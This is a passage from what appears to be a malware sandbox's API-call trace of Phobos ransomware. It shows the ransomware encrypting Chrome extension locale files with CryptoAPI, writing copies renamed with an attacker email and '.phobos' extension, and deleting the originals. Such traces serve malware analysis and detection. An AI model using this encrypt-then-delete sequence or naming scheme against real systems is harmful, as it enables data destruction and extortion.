lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=261) returned 1 [0151.215] CloseHandle (hObject=0x138) returned 1 [0151.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json")) returned 0x2020 [0151.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.216] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.216] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.216] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.216] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x105, lpOverlapped=0x0) returned 1 [0151.217] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.217] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.218] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.218] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.218] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.218] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.218] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.218] CloseHandle (hObject=0x138) returned 1 [0151.221] CloseHandle (hObject=0x134) returned 1 [0151.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json")) returned 1 [0151.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.222] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=258) returned 1 [0151.222] CloseHandle (hObject=0x134) returned 1 [0151.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json")) returned 0x2020 [0151.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.223] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.223] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.223] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.223] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x102, lpOverlapped=0x0) returned 1 [0151.224] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.224] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.225] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.225] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.225] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.225] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.225] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.225] CloseHandle (hObject=0x134) returned 1 [0151.225] CloseHandle (hObject=0x138) returned 1 [0151.225] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json")) returned 1 [0151.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.226] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=293) returned 1 [0151.226] CloseHandle (hObject=0x138) returned 1 [0151.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json")) returned 0x2020 [0151.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.227] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.227] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.227] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.227] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x125, lpOverlapped=0x0) returned 1 [0151.228] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0151.228] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0151.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.229] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.229] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.229] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.229] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.229] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.229] CloseHandle (hObject=0x138) returned 1 [0151.229] CloseHandle (hObject=0x134) returned 1 [0151.229] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json")) returned 1 [0151.230] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.230] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=281) returned 1 [0151.231] CloseHandle (hObject=0x134) returned 1 [0151.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json")) returned 0x2020 [0151.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.231] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.231] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x119, lpOverlapped=0x0) returned 1 [0151.232] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.232] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.233] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.233] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.233] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.233] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.233] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.233] CloseHandle (hObject=0x134) returned 1 [0151.233] CloseHandle (hObject=0x138) returned 1 [0151.234] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json")) returned 1 [0151.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.235] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=285) returned 1 [0151.235] CloseHandle (hObject=0x138) returned 1 [0151.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json")) returned 0x2020 [0151.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.235] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.235] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 